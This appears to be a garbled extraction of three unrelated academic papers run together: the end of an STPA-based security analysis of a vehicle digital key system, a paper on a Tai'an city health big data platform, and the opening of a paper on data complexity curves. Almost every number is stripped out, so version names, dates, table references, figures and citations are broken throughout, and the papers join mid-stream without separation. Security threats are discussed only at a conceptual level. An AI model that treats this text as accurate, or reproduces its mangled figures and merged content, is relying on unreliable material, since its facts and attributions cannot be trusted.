note: the guide word “timing issues cause vulnerability” represents “too early, too late, out of order” and “stopped too soon, applied too long” in the stpa-sec.

table loss scenarios of icas (identified loss scenarios of the icas listed above, identified with the guide words “controller”, “control path”, “controlled process”, and “feedback path”):
- phone_ctrlaction _insec _ls : the smartphone’s software is modified maliciously
- phone_ctrlaction _insec _ls : the control command is blocked on the path
- phone_ctrlaction _insec _ls : the server’s software is modified maliciously
- phone_ctrlaction _insec _ls : registration is done correctly but returns a nok result
- phone_ctrlaction _insec _ls : no data protection mechanism is used at the smartphone
- phone_ctrlaction _insec _ls : data is eavesdropped and decrypted on the path
- phone_ctrlaction _insec _ls : no data protection mechanism is used at the server

outcome comparison
functions and control actions are the basic elements of the stpa-dfsec and the stpa-sec, respectively. normally, a control action includes several functions to provide a service. for example, the control action phone_ctrlaction (smartphone registers at the server) consists of several functions, including “plain data process”, “transmit data to s”, “encrypt data by s’s public key”, and so on. therefore, the relationship between these two elements is that a sequence of executed functions forms a control action. to find out how both approaches work on the same use case, we mapped the outcomes of the two analyses against each other. we found that a loss scenario identified by the stpa-sec can be mapped to several stpa-dfsec loss scenarios. for example, the loss scenario phone_ctrlaction _insec _ls (smartphone’s software is modified maliciously) can be mapped to phone_func _ifb _ls (function is bypassed but returns a fake ok result), phone_func _ifb _ls (valid key is replaced by a forged one), and phone_func _ifb _ls (algorithm is maliciously modified by the attacker), which are all possible causes of losses related to the smartphone’s software. in reverse, one stpa-dfsec loss scenario can be related to several stpa-sec ones, because different control actions between components always share the same transmission channels and data process units. no matter whether the control action is “register”, “login”, or “lock the door”, they all require the “process plain data”, “encrypt data by the key”, and “transmit data” functions to perform the action. in conclusion, the stpa-sec focuses more on the application aspect of the system and aims to ensure that the control actions are secure, while the stpa-dfsec views the system as a data process machine: it focuses on the security of the data process and flows and does not care about the application meaning of the data.
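the many-to-many relationship described above can be captured as a simple mapping; in the sketch below (python) the label numbering is illustrative, since it only mirrors the single example given in the text.

```python
# illustrative many-to-many mapping between stpa-sec and stpa-dfsec loss scenarios.
sec_to_dfsec = {
    "phone_ctrlaction_insec_ls (smartphone software modified maliciously)": [
        "phone_func_ifb_ls (function bypassed but returns a fake ok result)",
        "phone_func_ifb_ls (valid key replaced by a forged one)",
        "phone_func_ifb_ls (algorithm maliciously modified by the attacker)",
    ],
}

# invert the mapping to see which stpa-sec scenarios a dfsec scenario relates to
dfsec_to_sec = {}
for sec_ls, dfsec_lss in sec_to_dfsec.items():
    for ls in dfsec_lss:
        dfsec_to_sec.setdefault(ls, []).append(sec_ls)

for ls, related in dfsec_to_sec.items():
    print(ls, "<->", related)
```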
discussion
finally, we discuss and conclude the differences and highlights of both approaches. the stpa-dfsec focuses on information flows and discusses possible vulnerabilities along the path of data flows, which helps to identify more detailed loss scenarios from the perspective of information flows. by contrast, the stpa-sec can reveal more insecure details linked to concrete application scenarios, since control actions are derived from the application aspect. the stpa-dfsec addresses in which data process unit a loss scenario occurs, while the stpa-sec addresses in which application scenario a loss scenario occurs. which approach to choose depends on the particular case, and two principles can help the decision. the first is the system purpose: if the analyst focuses on data process and transmission security, the stpa-dfsec is more suitable for an analysis from the data side; if providing proper and secure services is the main objective, the stpa-sec is applicable to identify insecure issues linked with application scenarios. the second principle is to consider who uses it: the stpa-dfsec is suitable for designers who are responsible for the technical structure and design, while the stpa-sec is more useful for those who design the system functionalities and make higher-level decisions. note that the proposed approach does not rely on known network vulnerabilities or attacks (e.g., eavesdropping and spoofing), since it is system-oriented and not threat-oriented. however, known vulnerabilities can be used as clues when identifying system-level vulnerabilities in step . for example, “v- ” in table is actually a spoofing attack but does not use the word “spoofing” explicitly; it is identified by the guide word “integrity”. known vulnerabilities can be kept in mind during the whole analysis process and work as secondary clues for identifying insecure behaviors or scenarios. however, experience from previous projects is not necessary for our approach. for example, the loss scenario “transmission channel is monitored illegally” in table , which may be attributed to an eavesdropping attack or other denial of service (dos) attacks, is identified by the proposed steps and guide words and not by the known eavesdropping or dos attacks.
analysts can use their preferred ways to describe the system vulnerabilities or choose suitable identification guide words in the analysis. known system vulnerabilities or attack types can help the identification but are not necessary conditions. two limitations of the stpa-dfsec have been identified. first, the stpa-based approaches lack an evaluation of the identified scenarios. in practice, the resources for mitigating insecure causes are limited; by evaluating and ranking the identified loss scenarios, the system designer can decide which insecure scenario should be avoided with high priority. to overcome this limitation, the stpa-based approaches can be combined with other evaluation metrics (e.g., the evita assessment method (ruddle et al., ) and the common vulnerability scoring system (first, )) to assess the identified insecure behaviors and scenarios. second, the analyst must have corresponding information about the data processing of the target system (e.g., how data flows among components and what kind of data process functions are contained); otherwise, the functional interaction structure cannot be constructed. in practice, system security engineering is not able to ensure absolute security but provides a sufficient base of evidence to support claims that the expected level of trustworthiness has been achieved (ross, mcevilley & oren, ). the analysis in security engineering also cannot be proven complete. the completeness of the analysis and the level of detail of the results normally depend on the analyst’s knowledge and experience, the design emphasis, and the available system information. however, a proper systematic approach can help the analyst to be more confident in the completeness of the analysis (young & leveson, ). proper guide words help to reduce the dependency on personal experience and subjective thinking and lead to relatively objective and valid results with less effort. the case study in this article represents the authors’ understanding of the example system and works as a demo to show how to use the proposed approach.

conclusion
in this article, we have proposed a data-flow-based approach for the security analysis of information-critical systems based on the stpa framework to overcome the stpa-sec’s limitations. the analyses of a vehicle digital key system using both the stpa-dfsec and the stpa-sec have been presented as examples to show how to use the approaches. finally, we compared the analysis results, presented the differences between both approaches, and discussed the highlights and drawbacks of the proposed stpa-dfsec. we have found that the proposed stpa-dfsec focuses on data flows and can reveal more details in information security aspects, which cannot be addressed directly in the stpa-sec analysis, while the stpa-sec analyzes the system from the perspective of applications and concerns more safety-related security issues. additionally, as an adaptation of the stpa-sec, the proposed stpa-dfsec, together with other stpa-based approaches, can be used to co-design complex systems across multiple disciplines under the unified stpa framework. social aspects and human factors can also be included in the analysis, which are excluded from traditional analysis approaches. the proposed approach is not a substitution but a complement to the original approach.
by using the stpa-dfsec, we view the system from a new perspective (i.e., the data processing aspect) other than control loops and may find new points that are not directly identified by the stpa-sec. because of the relationship between the control action and the function in both approaches, the identified insecure items and loss scenarios can be mapped to each other, which helps to understand and design the system better. with the increasing connectivity and complexity of modern systems, more traditional safety-critical systems nowadays require information security to protect intellectual property or privacy (e.g., vehicles and healthcare devices). based on the already-established stamp models of these systems, the proposed approach can be integrated into the existing work and address the security aspect. furthermore, compared to the existing approaches, the stpa-based ones are better suited to analyzing the system at a high strategy level, which provides a new point of view for security analysts to gain possible new ideas or understanding of the target system. in the future, we will study more real-world cases and conduct experiments with different groups of analysts to evaluate and refine the proposed approach in practice. furthermore, we will formalize the analysis process and design tools to produce analysis results automatically for higher working efficiency.

additional information and declarations
funding: this work was supported by the china scholarship council and funds of the german federal ministry of education and research under grant number kis . the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.
grant disclosures: the following grant information was disclosed by the authors: german federal ministry of education and research: kis .
competing interests: stefan wagner is an academic editor for peerj.
author contributions: jinghua yu conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. stefan wagner conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. feng luo conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft.
data availability: the following information was supplied regarding data availability: data are available as a supplemental file.
supplemental information: supplemental information for this article can be found online at http://dx.doi.org/ . /peerj-cs. #supplemental-information.

references
caralli ra, stevens jf, young lr, wilson wr. . introducing octave allegro: improving the information security risk assessment process. technical report, carnegie-mellon university. available at https://resources.sei.cmu.edu/library/asset-view.cfm?assetid= .
carter bt, bakirtzis g, elks cr, fleming ch. .
a systems approach for eliciting mission-centric security requirements. in: annual ieee international systems conference (syscon). piscataway: ieee, – .
carter bt, bakirtzis g, elks cr, fleming ch. . systems-theoretic security requirements modeling for cyber-physical systems. systems engineering ( ): – doi . /sys. .
etsi. . etsi ts - : cyber methods and protocols. part: method and pro forma for threat, vulnerability, risk analysis (tvra). technical specification. european telecommunications standards institute.
first. . common vulnerability scoring system v. . : specification document. available at https://www.first.org/cvss/v . /specification-document.
friedberg i, mclaughlin k, smith p, laverty d, sezer s. . stpa-safesec: safety and security analysis for cyber-physical systems. journal of information security and applications : – doi . /j.jisa. . . .
iso. . iso - road vehicles - functional safety - part: vocabulary. available at https://www.iso.org/standard/ .html.
karatzas s, chassiakos a. . system-theoretic process analysis (stpa) for hazard analysis in complex systems: the case of "demand-side management in a smart grid". systems ( ): doi . /systems .
khan s, madnick s, moulton a. . cybersafety analysis of a central utilities plant (cup) gas turbine using stpa-sec. available at https://pdfs.semanticscholar.org/fc /c e a eee bf b cbb feb e b .pdf.
leveson n, thomas j. . stpa handbook. available at https://psas.scripts.mit.edu/home/get_file.php?name=stpa_handbook.pdf.
mailloux lo, span m, mills rf, young w. . a top down approach for eliciting systems security requirements for a notional autonomous space system. in: ieee international systems conference (syscon). piscataway: ieee, – .
martin h, bramberger r, schmittner c, ma z, gruber t, ruiz a, macher g. . safety and security co-engineering and argumentation framework. in: international conference on computer safety, reliability, and security. berlin: springer, – .
microsoft. . the stride threat model. available at https://docs.microsoft.com/en-us/previous-versions/commerce-server/ee (v=cs. )?redirectedfrom=msdn.
nist. . framework for improving critical infrastructure cybersecurity, version . . available at https://nvlpubs.nist.gov/nistpubs/cswp/nist.cswp. .pdf.
olsson m. . healing vulnerabilities to enhance software security and safety. technical report, volvo technology ab. available at https://www.vinnova.se/globalassets/mikrosajter/ffi/dokument/slutrapporter-ffi/elektronik-mjukvara-och-kommunikation-rapporter/ - eng.pdf.
raspotnig c, karpati p, katta v. . a combined process for elicitation and analysis of safety and security requirements. in: bider i, halpin t, krogstie j, nurcan s, proper e, schmidt r, soffer p, wrycza s, eds. enterprise, business-process and information systems modeling. berlin: springer, – .
ross r, mcevilley m, oren j. . nist special publication - : systems security engineering considerations for a multidisciplinary approach in the engineering of trustworthy secure systems. gaithersburg: national institute of standards and technology.
ruddle a, ward d, weyl b, idrees s, roudier y, friedewald m, leimbach t, fuchs a, gürgens s, henniger o, rieke r, ritscher m, broberg h, apvrille l, pacalet r, pedroza g. .
security requirements for automotive on-board networks based on dark-side scenarios. available at https://zenodo.org/record/ .
sae. . j : cybersecurity guidebook for cyber-physical vehicle systems. available at https://www.sae.org/standards/content/j _ /.
schmittner c, gruber t, puschner p, schoitsch e. . security application of failure mode and effect analysis (fmea). in: international conference on computer safety, reliability, and security. berlin: springer, – .
schmittner c, ma z, puschner p. . limitation and improvement of stpa-sec for safety and security co-analysis. in: international conference on computer safety, reliability, and security. berlin: springer, – .
schneier b. . secrets & lies: digital security in a networked world. hoboken: john wiley & sons.
shapiro ss. . privacy risk analysis based on system control structures: adapting system-theoretic process analysis for privacy engineering. in: ieee security and privacy workshops (spw), san jose, ca, usa. piscataway: ieee, – .
sidhu as. . application of stpa-sec for analyzing cybersecurity of autonomous mining systems. phd thesis. massachusetts institute of technology.
torkildson en, li j, johnsen so. . improving security and safety co-analysis of stpa. in: proceedings of the th european safety and reliability conference (esrel). hannover: research publishing services.
wei lc, madnick s. . a system theoretic approach to cybersecurity risk analysis and mitigation for autonomous passenger vehicles. cambridge: mit sloan school of management.
young w, leveson n. . systems thinking for safety and security. in: proceedings of the th annual computer security applications conference, new orleans, louisiana, usa, – .
young w, leveson n. . inside risks - an integrated approach to safety and security based on system theory: applying a more powerful new safety methodology to security risks. communications of the acm ( ): – doi . / .
yu j, luo f. . a systematic approach for cybersecurity design of in-vehicle network systems with trade-off considerations. security and communication networks : doi . / / .
data-flow-based adaption of the system-theoretic process analysis for security (stpa-sec): introduction; related work; methodology; case study; discussion; conclusion; references.
international journal of advanced network, monitoring and controls volume , no.

design and research of healthy ecology system framework based on ipv

li qinyu, tai'an finance health medical information technology co., ltd; shandong radio, television and network co., ltd., tai'an branch, leigushi street, tai'an, shandong province; e-mail: @ .com
zhao hongwen, shandong radio, television and network co., ltd., tai'an branch, leigushi street, tai'an, shandong province; e-mail: tagdglcs@qq.com
geng an, shandong radio, television and network co., ltd., tai'an branch, leigushi street, tai'an, shandong province; e-mail: @qq.com
han lei, shandong radio, television and network co., ltd., tai'an branch, leigushi street, tai'an, shandong province; e-mail: @qq.com

abstract: with the improvement of living standards and changes in lifestyle, people's health awareness has been enhanced as a whole, and health demand has changed from a single medical service to multiple services such as disease prevention, health promotion, healthcare, and rehabilitation. the smart medical system, the internet + medical service mode, and the digital hospital have become the direction of medical development. in order to build the tai'an healthy big data ecological domain, accelerate the informatization reform of traditional medical processes, and improve the application level of information services, we build a medical system supported by the new-generation network ipv technology. the system is based on the medical institutions in tai'an city, shandong province, and covers the research and implementation of the health ecosystem business structure, core technology, network architecture, system software and hardware, and system security. the system was put into trial operation in the medical institutions of the whole city and has achieved good results.

keywords: ipv ; internet +; healthy ecology; health platform

i. the current status of health care
a. medical health background
a new round of scientific and technological revolution and industrial change is accelerating. life science technologies continuously make new breakthroughs, and major technologies such as genetic engineering, molecular diagnostics, stem cell therapy, and d printing are being applied at an accelerating pace. new-generation information, biology, and engineering technologies such as big data, cloud computing, the internet, and artificial intelligence are increasingly integrated into the medical and health fields. the rapid development of telemedicine, mobile medical care, precision medical care, smart medical care, and other technologies has promoted the vigorous development of new formats and models of the health industry, such as health management, health care, health tourism, leisure and health care, and "internet + health". the "th five-year plan for national population health informatization development" pointed out that we should strengthen population health informatization and the construction of the health care big data service system, promote the integration of government health care information systems and public health medical data, eliminate information barriers, focus on improving the ability and level of population health information governance, vigorously promote the development of health care big data applications, and explore new models and new formats of innovative "internet + health" services.
we will build a unified, authoritative, and interconnected platform for population health information, standardize and promote "internet + health care" services, and create new models of internet health care services. data collection, integration, sharing, and business coordination of applied information systems such as public health, family planning, medical services, medical security, drug supply, and comprehensive management are realized. in recent years, the aging population in shandong province has been characterized by a large base, rapid growth, and empty nesting. on the one hand, the needs of elders' life care and medical health care are superimposed, and the consumption demand in the fields of medical care and health care is strong, with huge space for the development of related industries. on the other hand, the health care industry in shandong province is still in its infancy, with relatively insufficient supply-side capacity, structural contradictions and policy barriers, a lack of high-quality resources, narrow coverage of medical care, and insufficient professional personnel, making it difficult to meet the needs of the elderly for different levels of health care services.

b. tai'an health care platform
in the "tai'an city transformation and upgrading of medical and health service industry implementation plan", tai'an city proposed to accelerate the construction of the "smart medical" system, explore the "internet + medical" service mode, and build digital hospitals. we will build a sound healthy tai'an big data ecological domain, accelerate the informatization reform of the traditional medical treatment process, and improve the application level of informatization services. the government encourages medical and health institutions to make full use of the advantages of internet development. the design and research of this system are based on the medical informatization of tai'an city, shandong province, led by tai'an central hospital and tai'an city hospital of traditional chinese medicine. the district and county people's hospitals are the main force, and the informatization development of these hospitals is relatively mature. however, the information systems of some secondary hospitals, primary health care institutions, medical associations, medical communities, internet hospitals, and regional medical and health platforms are not well developed and cannot meet the growing needs of medical information development. take the construction of medical and health information in feicheng city as an example: with the rapid development of it technology, soa technology, saas applications, wireless networks, and other new technologies, the price of it equipment is getting lower and lower, which makes the construction of a smart city feasible both technically and economically. meanwhile, with the continuous application of cloud computing technology in the practice of medical informatization, the construction of regional medical informatization can achieve better results on this basis.

in august , the ministry of information industry officially defined ipv as a new-generation internet, to distinguish it from the ipv next-generation internet. the internet based on the tcp/ip protocol has been unable to meet the needs of future development through increased bandwidth and gradual improvement alone. in order to break through future network basic theory and support new-generation internet experiments,
it is necessary to build test facilities, including: an original network equipment system, a resource monitoring and management system, and facilities covering cloud computing services, internet of things applications, spatial information network simulation, and network information security. on november , the general staff department of the people's liberation army organized the ipv technology project application seminar at no. dacheng road in beijing. the participants discussed and demonstrated the application of the healthy tai'an big data ecological domain as an ipv technology application. it was required to speed up the construction of the tai'an big data ecological domain, rapidly increase the scale of the ipv network, and strive to build an ipv network technology demonstration zone through the healthy tai'an big data ecological domain. tai'an city "smart medicine" was achieved through the establishment of a unified data standard for health information in tai'an city, the sharing of public health information resources, electronic two-way referral, mutual recognition of inspection results within the city, and the application of the health card across the city. with the healthy tai'an big data ecological domain as the core, it realizes information interconnection and sharing as well as comprehensive business collaboration. it promotes the development of a large health industry, makes management more scientific and business smarter, benefits more residents, and promotes the openness of the health and family planning business in tai'an city. through the construction of this platform, the informatization construction of health and family planning in tai'an city has reached the national first-class level.

ii. ecological domain system
the tai'an big data ecological domain can provide personalized health management and health care for residents and improve residents' satisfaction. it can provide life-cycle health information for residents and provide them with networked and informatized health services and health management. it enables residents to obtain continuous, comprehensive, and high-quality health care services. it improves the efficiency of health services and reduces the waiting time of residents. it supports the rational use of high-quality regional health resources and effectively resolves the rational division of labor and allocation between primary hospitals and secondary and large hospitals.

a. system business architecture
the health tai'an big data ecosystem consists of five parts: the business system layer, the it basic service layer, the data layer (data warehouse), the application layer, and the service layer (internet + convenient service platform). the business system layer includes the business systems of medical institutions, health management centers, public health institutions, and other administrative agencies. through the ipv service private network and the network equipment, servers, and storage equipment in the it basic service layer, data such as electronic medical records, health files, population, and health resources are stored in the data layer. we divide the platform business systems into three categories according to the different roles of data usage. the first category is the internet + service platform for residents (including the health tai'an website, the health tai'an app, the internet hospital, etc.). the second category is the medical collaborative service system for medical and health personnel (including the hierarchical diagnosis and treatment platform, the health identity card management system, telemedicine, health tai'an imaging/ecg/inspection/pathology, etc.).
the third international journal of advanced network, monitoring and controls volume , no. , category is the medical and health supervision system which serving the medical and health administrative institutions (including the medical and health supervision platform, medical reform monitoring system, third-party regional evaluation system, etc.). meanwhile, business intelligence in data warehouse can be used to support the development of big data analysis and artificial intelligence. the entire platform architecture conforms to the international and national information standard management system and information security protection framework to ensure the consistency and security of the exchange of data. meanwhile, the remote disaster recovery and backup mode in line with international requirements is specially used to ensure the safe storage of data from natural or man-made disasters. figure . business architecture of health tai’an big data ecological domain b. overall technical architecture the health tai’an big data ecological domain database uses relational databases such as mysql, oracle, sql server, and the development language uses java and .net. the platform service is built with esb bus and soa architecture, which provides perfect technical support for big data, and realizes rapid access to massive data. the flat platform provides complete functions such as collaborative support services and configuration management, and provides a comprehensive monitoring mechanism for the operating environment, which facilitates the rapid positioning and troubleshooting of problems. the overall technical framework of the platform conforms to the national standard and standard system, and adopts the data exchange standard of the industry standard, and adopts a variety of security mechanisms and security technologies to ensure the stable operation of the platform. international journal of advanced network, monitoring and controls volume , no. , figure . technical architecture of health tai’an big data ecological domain ) soa architecture support the platform adopts the micro services architectural mode. micro services are an updated version of the traditional soa architectural pattern that supports for fine-grained control. each system accessed in healthy tai’an big data ecological domain is equivalent to micro services component, which dynamically realizes service scheduling and balance through registration and discovery mechanism. in addition, each service component can deploy multiple instances, effectively improving the overall stability of the platform. a service component is a mineralized project with distributed deployment and invocation that provides a type of interface services. in terms of interface granularity division of service components, appropriate granularity should be adopted to split the interfaces to ensure the flexibility of top-level application calls and reduce the number of calls between different components to avoid complex business logic dependencies between components. ) esb bus technology esb (enterprise service bus) is the combination of traditional middleware technology and xml, web service technology. the esb provides the most basic connectivity hub in a network and is an essential element in building an enterprise nervous system. the enterprise service bus is the latest way to provide reliable, guaranteed messaging technology.esb middleware products leverage web services standards and interfaces with recognized reliable messaging protocols. 
common features of esb products include: connecting heterogeneous mom, encapsulating the mom protocol using the web services description language interface, and the ability to transport simple object application protocol (soap) transport streams on the mom transport layer. international journal of advanced network, monitoring and controls volume , no. , the esb uses the "bus" model to manage and simplify the integration topology between applications, based on open standards to support dynamic interconnectivity between applications at the level of messages, events, and services. the platform adopts b/s architecture and saas deployment mode, which is different from traditional medical information platform manufacturers and the overall architecture design, is more advanced and efficient. c. overall standard architecture of the platform following the unified standard, unified code, unified interface, under the principle of combing and standardized data through canonical business definition, strictly in accordance with established standards and technical route, so as to realize multiple departments, multiple system, information technology, as well as heterogeneous platform environment, interconnection, make sure that the maturity of the whole system, expansibility and adaptability, to evade the risk of system construction. under the principle of “unified specification, unified code, and unified interface”, the system strictly abides by established standards and technical routes, thereby achieving information interconnection in multi-sector, multi-system, multi-technology, and heterogeneous platform environments. figure . the standard architecture health tai’an big data ecological domain international journal of advanced network, monitoring and controls volume , no. , d. platform security architecture the platform security architecture refers to iso- and the third level of the national information security level protection system requirements. from the aspects of technology, operation and maintenance, management system and infrastructure, it is divided into security technology system, operation and maintenance security system, information security management system, security infrastructure and other parts. figure . the security architecture health tai’an big data ecological domain the security technology system is mainly divided into application security, data security, network security and host security. ) application security. application security mainly against common web security vulnerabilities published by owasp. it mainly includes sql injection, invalid authentication and authentication management, xss attacks, invalid access control, sensitive information disclosure, csrf, use of known vulnerability components, unprotected api, insufficient logging and monitoring and other web vulnerabilities. ) data security. database security relies on various technologies and management measures to ensure data security, availability, integrity and confidentiality through data encryption, data desensitization, data storage backup, and access control. ) network security. network security is mainly to ensure the integrity, confidentiality and non-repudiation of data in the process of network transmission. through data transmission process encryption, intrusion prevention guarantees network security. ) host security. 
host security solves the main security risks faced by the server, builds a server security protection system to prevent information leakage and risk by firewalls, white list isolation, security configuration, etc. international journal of advanced network, monitoring and controls volume , no. , iii. system network architecture the system is divided into six areas, and the core area is two huawei s data center level switch clusters. the core area is connected to all other areas using dual gigabit connections. the network topology is shown in figure . figure . topology architecture of healthy tai’an big data ecological domain network the access area is the area where all health cares institutions access. two huawei gigabit firewalls are used for isolation and aggregation. the business volume in the early stage is limited, and each of the two firewalls uses a gigabit connection, which can be expanded at any time with the business development in the future. the internal network area is centered on two ipv backbone routers and huawei data firewall. the data firewall isolates the internal network from the core switch to protect it. the establishment of virtual servers and storage devices in the internal network area is completed through optical fiber switches. the ipv router backbone router encrypts the address of the core data area of the internal network for higher security. the external network deployment has the external network firewall. the anti-attack device is deployed to further increase the security protection of the external network. platform logging, auditing, monitoring and ipv management are deployed in the management area. the security zone is used to deploy topsec vulnerability scanning, network auditing, and flow international journal of advanced network, monitoring and controls volume , no. , control devices, which mainly provide security auditing and vulnerability scanning andother protection functions for the network. iv. design of system hardware architecture the system is equipped with huawei key business server minicomputer, which is mainly used in his system. it gives full play to the characteristics of strong processing capacity and high reliability of the minicomputer to ensure the normal operation of the hospital's daily business for hours. the system is equipped with huawei high-performance data server, which serves as the city's population health records database to ensure the security of these important data. the high-performance generic server runs the lis system, supply chain system, pacs system, medical business collaboration, internet applications, and other applications. the cloud mode dynamically adjusts the computing resources of the server according to the running status of the service. each virtual machine can be used as a backup. if a hardware server fails, the service will not be affected. the hardware architecture of the system is shown in figure . figure . topology diagram of health tai’an big data ecological domain equipment. according to the outpatient volume of all levels of hospitals within tai’an region, the available storage capacity of healthy tai’an big data ecological domain is . t, which can meet the business needs in the next to years. the storage portion consists of huawei oceanstor v and huawei international journal of advanced network, monitoring and controls volume , no. , oceanstor v virtualized shared storage disk array. 
the system plans huaweirh hv , (cpu e - v , g memory g hard disk) server, as a silver enterprise server, deploys two independent physical machine servers. system antivirus virus database upgrade server, and system antivirus virus database requires independent physical server. v. system implementation tai’an city health big data ecological domain designed in accordance with the above framework system, it has completed the overall planning of nearly platforms and products in categories, including basic platform, medical service, health service, healthy family, business system, benefit people service, business supervision, emerging technology since its construction in . the system has completed the construction of all basic platforms, including platform standard management system, platform basic service, data exchange service, data resource service, information system integration platform, platform operation and maintenance system, platform security system. it has completed the construction of the information system of all primary medical institutions, including cloud his, cloud lis, cloud pacs, cloud emr and so on. some health services have been completed, including basic public health services and family doctor services. it has completed the construction of some business collaboration systems, including medical group/medical association/medical community/specialist alliance system, health id card management system, health record access system, two-way referral system, remote consultation system, imaging center system. it has completed the construction of some beneficial services, including health tai’an website/app, internet hospital, prescription sharing platform, pharmacy purchasing, sales and storage management system, online drug purchase management system, etc. it has completed the construction of some business supervision system, including medical and health supervision system, financial fund supervision system, medical insurance control system, etc. the detail is as follows: figure . application system module map in the above system, the financial capital clearing platform has been used in various medical and health unit in the whole city. the fourth people's hospital of tai'an city, tai'an traditional chinese medicine hospital, and wangzhuang town health center of feicheng city of medical informatization and internet + application have been comprehensively. it has been fully launched and stable, and has been highly praised by visiting experts. the fourth people's hospital of tai'an city, the wangzhuang town health center of feicheng city is applying for a typical case of the national universal medical health information platform. international journal of advanced network, monitoring and controls volume , no. , the overall platform has achieved good application results, and the operation based on ipv network platform is stable and reliable. reference [ ] xie jianping etc. method of using whole digital code to assign address for computer [p].us: , . . [ ] xie jianping, xu dongmei, etc.digital domain name specification. sj/t - , . . [ ] information technology-future network- problem statement and requirement-part : naming and addressing, iso/iec dtr - , , . [ ] radio frequency identification tag information query service network architecture technical specification. sj/t - , . [ ] j. onions, network working group. a historical perspective on the usage of ip version . rfc . . . 
[ ] notice of the shandong provincial government on printing and distributing the work plan for the promotion of the construction of medical complex in shandong province, issued by shandong administrative office. no. [ ] [ ] notice on printing and distributing the implementation plan for promoting the construction of tai’an city medical consortium, issued by thailand administrative office. no. [ ] [ ] opinions of the shandong provincial government on the implementation of document. no. [ ] of the state council on promoting and standardizing the development of the application of big data in health care. no. [ ]. issued by the council of shandong province. [ ] notice of the national health and family planning commission on printing and distributing guidelines on the application of hospital information platform. no. of the planning letter of the national health office [ ] [ ] notice of shandong provincial health and family planning commission on the implementation of contract service for family doctors. no. [ ] [ ] notice on the -day action of internet + medical and health care for the benefit of the people. no. [ ] [ ] notice of the state council on printing and distributing the implementation and assessment program of healthy china action organization. no. [ ] submitted march accepted july published august corresponding author dariusz m. plewczynski, dariuszplewczynski@gmail.com academic editor jaume bacardit additional information and declarations can be found on page doi . /peerj-cs. copyright zubek and plewczynski distributed under creative commons cc-by . open access complexity curve: a graphical measure of data complexity and classifier performance julian zubek , and dariusz m. plewczynski centre of new technologies, university of warsaw, warsaw, poland institute of computer science, polish academy of sciences, warsaw, poland abstract we describe a method for assessing data set complexity based on the estimation of the underlining probability distribution and hellinger distance. in contrast to some popular complexity measures, it is not focused on the shape of a decision boundary in a classification task but on the amount of available data with respect to the attribute structure. complexity is expressed in terms of graphical plot, which we call complexity curve. it demonstrates the relative increase of available information with the growth of sample size. we perform theoretical and experimental examination of properties of the introduced complexity measure and show its relation to the variance component of classification error. we then compare it with popular data complexity measures on diverse data sets and show that it can contribute to explaining performance of specific classifiers on these sets. we also apply our methodology to a panel of simple benchmark data sets, demonstrating how it can be used in practice to gain insights into data characteristics. moreover, we show that the complexity curve is an effective tool for reducing the size of the training set (data pruning), allowing to significantly speed up the learning process without compromising classification accuracy. the associated code is available to download at: https://github.com/zubekj/complexity_curve (open source python implementation). 
subjects algorithms and analysis of algorithms, artificial intelligence, data mining and machine learning keywords learning curves, data complexity, data pruning, hellinger distance, bias-variance decomposition, performance measures introduction it is common knowledge in machine learning community that the difficulty of classification problems varies greatly. sometimes it is enough to use a simple out-of-the-box classifier to get a very good result and sometimes careful preprocessing and model selection are needed to get any non-trivial result at all. the difficulty of a classification task clearly stems from certain properties of the data set, yet we still have problems with defining those properties in general. bias–variance decomposition (domingos, ) demonstrates that the error of a predic- tor can be attributed to three sources: bias, coming from the inability of an algorithm to build an adequate model for the relationship present in data; variance, coming from the inability to estimate correct model parameters from an imperfect data sample; and the how to cite this article zubek and plewczynski ( ), complexity curve: a graphical measure of data complexity and classifier perfor- mance. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:dariuszplewczynski@gmail.com mailto:dariuszplewczynski@gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://github.com/zubekj/complexity_curve http://dx.doi.org/ . /peerj-cs. irreducible error component commonly called noise. following this line of reasoning, the difficulty of a classification problem may come partly from the complexity of the relation between dependent variable and explanatory variables, partly from the scarcity of infor- mation in the training sample, and partly from class ambiguity (due to noise in the target variable or an overlap between classes). this is identical to sources of classification difficulty identified by ho & basu ( ), who labelled the three components: ‘complex decision boundary,’ ‘small sample size and dimensionality induced sparsity’ and ‘ambiguous classes.’ in this article, we introduce a new measure of data complexity targeted at sample sparsity, which is mostly associated with variance error component. we aim to measure information saturation of a data set without making any assumptions on the form of the relation between dependent variable and the rest of variables, so explicitly disregarding shape of the decision boundary and classes ambiguity (e.g., caused by noise on the target variable). our complexity measure takes into account the number of samples, the number of attributes, and the internal structure of attributes under a simplifying assumption of attribute independence. the key idea is to check how well a data set can be approximated by its subsets. if the probability distribution induced by a small data sample is very similar to the probability distribution induced by the whole data set, we say that the set is saturated with information and presents an opportunity to learn the relationship between variables without promoting the variance. to operationalise this notion, we introduce two kinds of plots: • complexity curve—a plot presenting how well subsets of growing size approximate distribution of attribute values. it is a basic method applicable to clustering, regression and classification problems. 
• conditional complexity curve—a plot presenting how well subsets of growing size approximate conditional distribution of attribute values given class. it is applicable to classification problems and more robust against class imbalance or differences in attributes structure between classes. since the proposed measure characterise the data sample itself without making any assumptions as to how that sample will be used, it should be applicable to all kinds of problems involving reasoning from data. in this work, we focus on classification tasks since this is the context in which data complexity measures were previously applied. we compare the area under the complexity curve with popular data complexity measures and show how it complements the existing metrics. we also demonstrate that it is useful for explaining classifier performance by showing that the area under the complexity curve is correlated with the area under the receiver operating characteristic (auc roc) for popular classifiers tested on benchmark data sets. we propose an immediate application of the developed method connected with the fundamental question: how large data sample is needed to build a successful predictor? we pursue this topic by proposing a data pruning strategy based on complexity curve and evaluating it on large data sets. we show that it can be considered as an alternative to progressive sampling strategies (provost, jensen & oates, ). zubek and plewczynski ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. related literature the problem of measuring data complexity in the context of machine learning is broadly discussed. our beliefs are similar to those of ho ( ), who stated the need for including data complexity analysis in algorithm comparison procedures. similar needs are also discussed in fields outside machine learning; for example, in combinatorial optimisation (smith-miles & lopes, ). the general idea is to select a sufficiently diverse set of problems to demonstrate both strengths and weaknesses of the analysed algorithms. the importance of this step was 